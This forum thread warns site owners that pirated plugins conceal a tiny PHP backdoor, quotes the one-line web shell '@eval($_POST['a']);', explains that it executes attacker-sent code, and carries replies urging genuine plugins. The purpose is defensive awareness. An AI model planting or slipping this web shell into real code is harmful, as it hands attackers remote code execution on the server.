查看: 500|回复: 5

某盗版插件中惊现一句话木马,小到让你根本无法发现

[复制链接]

128

主题

370

回帖

595

积分

高级会员

积分
595
发表于 2023-3-29 18:50:13 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
传送门:安全小知识:为什么使用盗版插件容易被挂马!
  1. @eval($_POST['a']);
复制代码
如上面所示,就这么短短的几个字符,隐藏在盗版插件正常代码之中,如果不细心的话,根本无法发现。
不懂php的人,可能会怀疑,这么短的一个代码,就是木马?
eval就是把普通的字符串当做php代码来执行,像上面这个代码就是执行接收到的POST数据,利用这段代码,黑客就可以向你的服务器执行代码了。
抓紧时间卸载盗版插件吧,盗版插件的安全问题已经不能忽视了!


传送门:安全小知识:为什么使用盗版插件容易被挂马!

免责声明

1.本网站所收集的部分公开资料来源于互联网,转载的目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。
2.如果您发现网站上有侵犯您的知识产权的作品,请与我们取得联系,我们会及时修改或删除。

上一篇:手机版有必要增加暗黑模式吗?
下一篇:【终章】魔趣吧已知的木马后门列表,你还敢用盗版吗?

回复

使用道具 举报

156

主题

357

回帖

626

积分

高级会员

积分
626
发表于 2023-3-29 18:50:43 | 显示全部楼层
前排支持,拒绝盗版
如果你只要用了一次盗版插件,一句后门代码,就可以让整个网站作废

有些攻击者不是只劫持首页到非法网站上那么简单,有的时候还会用“间谍式”写入更多潜在后门入口文件,而且命名法会伪装成正常文件名称,代码可能还是加密,以免被检测,这样就可以留着以后再进行攻击,即使你这时候把盗版插件删除,也是无济于事,还是一样会被攻击,除非你把所有新植入的后门文件也都删除了,否则针对一般站长而言,想要安全,就不得不重装网站了

如果等发生以上情况再付费找人清理后门文件和维护,不但服务费成本高,也可能没法根除到底,对于如果用心经营网站的站长,千万不要选择盗版插件,也不要随意授权网站关键信息资源给第三方,如服务器,FTP等,做好及时性备份,拒绝使用盗版插件或模版
回复 支持 反对

使用道具 举报

145

主题

352

回帖

601

积分

高级会员

积分
601
发表于 2023-3-29 18:51:18 | 显示全部楼层
不能用 盗版  

万一有个木马  全站就废了

还是正版用着放心既可以  以后更新  还有售后服务!
回复 支持 反对

使用道具 举报

145

主题

352

回帖

601

积分

高级会员

积分
601
发表于 2023-3-29 18:51:29 | 显示全部楼层
坚决不用盗版
回复 支持 反对

使用道具 举报

145

主题

352

回帖

601

积分

高级会员

积分
601
发表于 2023-3-29 18:52:04 | 显示全部楼层
说的对,支持 正版
回复 支持 反对

使用道具 举报

156

主题

357

回帖

626

积分

高级会员

积分
626
发表于 2023-3-29 18:52:53 | 显示全部楼层
哦哦明白了
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表